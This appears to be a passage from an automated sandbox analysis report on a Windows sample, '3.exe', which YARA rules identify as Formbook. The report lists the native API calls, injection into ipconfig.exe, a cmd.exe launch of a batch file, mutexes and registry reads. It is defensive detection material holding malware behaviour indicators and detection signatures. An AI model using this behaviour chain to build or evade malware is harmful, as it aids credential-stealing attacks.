Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9B00 NtSetValueKey,1_2_00AE9B00
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE95F0 NtQueryInformationFile,1_2_00AE95F0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9520 NtWaitForSingleObject,1_2_00AE9520
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEAD30 NtSetContextThread,1_2_00AEAD30
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9560 NtWriteFile,1_2_00AE9560
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE96D0 NtCreateKey,1_2_00AE96D0
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9610 NtEnumerateValueKey,1_2_00AE9610
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9670 NtQueryInformationProcess,1_2_00AE9670
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9650 NtQueryValueKey,1_2_00AE9650
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9730 NtQueryVirtualMemory,1_2_00AE9730
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEA710 NtOpenProcessToken,1_2_00AEA710
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9760 NtOpenProcess,1_2_00AE9760
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AE9770 NtSetInformationFile,1_2_00AE9770
Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AEA770 NtOpenThread,1_2_00AEA770
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9A50 NtCreateFile,LdrInitializeThunk,19_2_02BE9A50
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9860 NtQuerySystemInformation,LdrInitializeThunk,19_2_02BE9860
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9840 NtDelayExecution,LdrInitializeThunk,19_2_02BE9840
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE99A0 NtCreateSection,LdrInitializeThunk,19_2_02BE99A0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_02BE9910
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE96E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_02BE96E0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE96D0 NtCreateKey,LdrInitializeThunk,19_2_02BE96D0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 19_2_02BE9780 NtMapViewOfSection,LdrInitializeThunk,19_2_02BE9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9FE0 NtCreateMutant,LdrInitializeThunk,19_2_02BE9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9710 NtQueryInformationToken,LdrInitializeThunk,19_2_02BE9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95D0 NtClose,LdrInitializeThunk,19_2_02BE95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9540 NtReadFile,LdrInitializeThunk,19_2_02BE9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A80 NtOpenDirectoryObject,19_2_02BE9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A20 NtResumeThread,19_2_02BE9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A10 NtQuerySection,19_2_02BE9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A00 NtProtectVirtualMemory,19_2_02BE9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA3B0 NtGetContextThread,19_2_02BEA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9B00 NtSetValueKey,19_2_02BE9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98A0 NtWriteVirtualMemory,19_2_02BE98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98F0 NtReadVirtualMemory,19_2_02BE98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9820 NtEnumerateKey,19_2_02BE9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEB040 NtSuspendThread,19_2_02BEB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE99D0 NtCreateProcessEx,19_2_02BE99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9950 NtQueueApcThread,19_2_02BE9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9610 NtEnumerateValueKey,19_2_02BE9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9670 NtQueryInformationProcess,19_2_02BE9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9660 NtAllocateVirtualMemory,19_2_02BE9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9650 NtQueryValueKey,19_2_02BE9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE97A0 NtUnmapViewOfSection,19_2_02BE97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9730 NtQueryVirtualMemory,19_2_02BE9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA710 NtOpenProcessToken,19_2_02BEA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA770 NtOpenThread,19_2_02BEA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9770 NtSetInformationFile,19_2_02BE9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9760 NtOpenProcess,19_2_02BE9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95F0 NtQueryInformationFile,19_2_02BE95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEAD30 NtSetContextThread,19_2_02BEAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9520 NtWaitForSingleObject,19_2_02BE9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9560 NtWriteFile,19_2_02BE9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001281B0 NtCreateFile,19_2_001281B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00128260 NtReadFile,19_2_00128260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282E0 NtClose,19_2_001282E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282DA NtClose,19_2_001282DA
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02BAB150 appears 136 times
Source: C:\Users\user\Desktop\3.exe | Code function: String function: 00AAB150 appears 90 times
Source: C:\Users\user\Desktop\3.exe | Code function: String function: 0230A358 appears 40 times
Source: C:\Users\user\Desktop\3.exe | Code function: String function: 02305898 appears 48 times
Source: C:\Users\user\Desktop\3.exe | Code function: String function: 02304D43 appears 56 times
Source: 3.exe | Static PE information: invalid certificate
Source: 3.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 3.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3.exe, 00000001.00000003.242843726.0000000000866000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3.exe
Source: 3.exe, 00000001.00000002.303149513.000000000066E000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs 3.exe
Source: 3.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.217187289.0000000003088000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.215422596.0000000003068000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.215851322.0000000003084000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.215763701.000000000306C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.215525181.0000000003080000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.216098891.0000000003098000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.215441416.0000000003084000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/5@14/5
Source: C:\Users\user\Desktop\3.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:204:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
Source: C:\Users\user\Desktop\3.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Users\user\Desktop\3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\3.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\3.exe | File read: C:\Windows